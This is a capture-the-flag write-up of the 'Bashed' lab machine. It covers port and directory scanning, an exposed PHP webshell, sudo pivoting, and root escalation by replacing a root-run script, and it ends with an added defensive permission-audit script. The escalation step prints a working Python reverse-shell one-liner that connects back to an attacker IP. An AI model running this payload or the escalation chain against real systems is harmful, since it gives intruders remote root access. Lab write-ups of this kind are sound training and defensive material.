I ran Nmap.

# Nmap 7.25BETA2 scan initiated Sat Feb 10 10:05:35 2018 as: nmap -vv -Pn -sS -A -sC -p- -T 3 --script-args=unsafe=1 -oA detailed_scan -n 10.10.10.68
Increasing send delay for 10.10.10.68 from 0 to 5 due to 379 out of 1262 dropped probes since last increase.
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.26s latency).
Scanned at 2018-02-10 10:05:37 EST for 1856s
Not shown: 65485 closed ports
Reason: 65485 resets
PORT     STATE    SERVICE REASON         VERSION
80/tcp   open     http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
7515/tcp filtered unknown no-response
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.25BETA2%E=4%D=2/10%OT=80%CT=1%CU=40317%PV=Y%DS=2%DC=T%G=Y%TM=5A
OS:7F1181%P=i686-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(S
OS:P=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%II
OS:=I%TS=8)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%TS=8)OPS(O1=M508ST11NW7%O2=M508ST1
OS:1NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=71
OS:20%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5
OS:08NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.007 days (since Sat Feb 10 10:26:33 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   257.82 ms 10.10.14.1
2   259.11 ms 10.10.10.68

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 10 10:36:33 2018 -- 1 IP address (1 host up) scanned in 1859.43 seconds
I checked port 80, then ran dirbuster.

root@kali:~/Desktop/HTB/bashed# gobuster -u http://10.10.10.68/ \
> -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s '200,204,301,302,307,403,500' -e

Gobuster v1.1                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.68/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 200,204,301,302,307,403,500
[+] Expanded     : true
=====================================================
http://10.10.10.68/.hta (Status: 403)
http://10.10.10.68/.htpasswd (Status: 403)
http://10.10.10.68/.htaccess (Status: 403)
http://10.10.10.68/css (Status: 301)
http://10.10.10.68/dev (Status: 301)
http://10.10.10.68/fonts (Status: 301)
Under http://10.10.10.68/dev I found phpbash.php, a semi-interactive webshell (https://github.com/Arrexel/phpbash).

I checked the filesystem and found a folder /scripts owned by scriptmanager.

www-data@bashed:/# ls -lah
total 88K
drwxr-xr-x  23 root          root          4.0K Dec  4 13:02 .
drwxr-xr-x  23 root          root          4.0K Dec  4 13:02 ..
drwxr-xr-x   2 root          root          4.0K Dec  4 11:22 bin
drwxr-xr-x   3 root          root          4.0K Dec  4 11:17 boot
drwxr-xr-x  19 root          root          4.2K Apr 28 09:52 dev
drwxr-xr-x  89 root          root          4.0K Dec  4 17:09 etc
drwxr-xr-x   4 root          root          4.0K Dec  4 13:53 home
lrwxrwxrwx   1 root          root            32 Dec  4 11:14 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root          4.0K Dec  4 11:16 lib
drwxr-xr-x   2 root          root          4.0K Dec  4 11:13 lib64
drwx------   2 root          root           16K Dec  4 11:13 lost+found
drwxr-xr-x   4 root          root          4.0K Dec  4 11:13 media
drwxr-xr-x   2 root          root          4.0K Feb 15  2017 mnt
drwxr-xr-x   2 root          root          4.0K Dec  4 11:18 opt
dr-xr-xr-x 117 root          root             0 Apr 28 09:52 proc
drwx------   3 root          root          4.0K Dec  4 13:03 root
drwxr-xr-x  18 root          root           500 Apr 28 09:53 run
drwxr-xr-x   2 root          root          4.0K Dec  4 11:18 sbin
drwxrwxr--   2 scriptmanager scriptmanager 4.0K Dec  4 18:06 scripts
drwxr-xr-x   2 root          root          4.0K Feb 15  2017 srv
dr-xr-xr-x  13 root          root             0 Apr 28 09:53 sys
drwxrwxrwt  10 root          root          4.0K Apr 28 09:53 tmp
drwxr-xr-x  10 root          root          4.0K Dec  4 11:13 usr
drwxr-xr-x  12 root          root          4.0K Dec  4 11:20 var
lrwxrwxrwx   1 root          root            29 Dec  4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
I ran sudo -l and found out that I can run commands as the user scriptmanager without a password.

sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Using sudo -u I was able to change the permissions of the /scripts directory.

I found two files under the /scripts directory, test.py and test.txt.

www-data@bashed:/scripts# ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Feb 10 20:09 test.py
-rw-r--r-- 1 root          root          12 Feb 10 20:43 test.txt
test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close   # as found on the box: close is referenced, not called, so the file is only flushed at interpreter exit
test.txt
testing 123!
I noticed from the timestamp that test.txt is rewritten at least every 5 minutes, and that root owns it.

I changed the permissions of test.py so I could replace its contents with a Python reverse shell.

sudo -u scriptmanager chmod 777 /scripts/test.py
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.15',1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" > test.py

After waiting a few minutes, I got root.
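The root cause here is a root-run job executing a script that a non-root user owns, sitting in a directory that user can also write to. As an added example (not part of the original writeup), the audit below walks every component of a path that root executes and reports any a non-root user could modify; the uid/gid 1001 for scriptmanager in the sample table is constructed, and it assumes the periodic rewrite of test.txt is a root cron job, which the writeup infers but never shows.

```python
import os
import stat
import sys

# Constructed stand-in for the box's filesystem: path -> (uid, gid, st_mode).
# uid/gid 1001 for scriptmanager is an assumption; the page only shows the name.
SAMPLE_FS = {
    "/": (0, 0, 0o40755),                        # drwxr-xr-x root
    "/scripts": (1001, 1001, 0o40774),           # drwxrwxr-- scriptmanager
    "/scripts/test.py": (1001, 1001, 0o100644),  # -rw-r--r-- scriptmanager
    "/scripts/test.txt": (0, 0, 0o100644),       # -rw-r--r-- root
}


def writable_by_nonroot(uid, gid, mode):
    """True if some user other than root can write the object (for a
    directory: create, rename or delete entries in it)."""
    if uid != 0 and mode & stat.S_IWUSR:       # non-root owner with write bit
        return True
    if gid != 0 and mode & stat.S_IWGRP:       # non-root group with write bit
        return True
    if mode & stat.S_IWOTH:                    # world-writable ...
        # ... except a sticky directory (e.g. /tmp), where others cannot
        # rename or unlink entries they do not own.
        return not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX)
    return False


def audit_root_executed_path(path, lookup):
    """Return every prefix of `path` (/, /scripts, /scripts/test.py, ...) that a
    non-root user could modify. Any hit means a root job running `path` can be
    hijacked: the file itself can be edited, or a parent can be swapped out."""
    parts = [p for p in path.split("/") if p]
    prefixes = ["/"] + ["/" + "/".join(parts[:i + 1]) for i in range(len(parts))]
    findings = []
    for prefix in prefixes:
        uid, gid, mode = lookup(prefix)
        if writable_by_nonroot(uid, gid, mode):
            findings.append(prefix)
    return findings


def lookup_sample(path):
    return SAMPLE_FS[path]


def lookup_real(path):
    st = os.stat(path)
    return st.st_uid, st.st_gid, st.st_mode


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/scripts/test.py"
    lookup = lookup_real if len(sys.argv) > 1 else lookup_sample
    print("weak components:", audit_root_executed_path(target, lookup))
```

Run with a real path as the argument to check a live crontab entry; with no argument it audits the constructed copy of the Bashed layout.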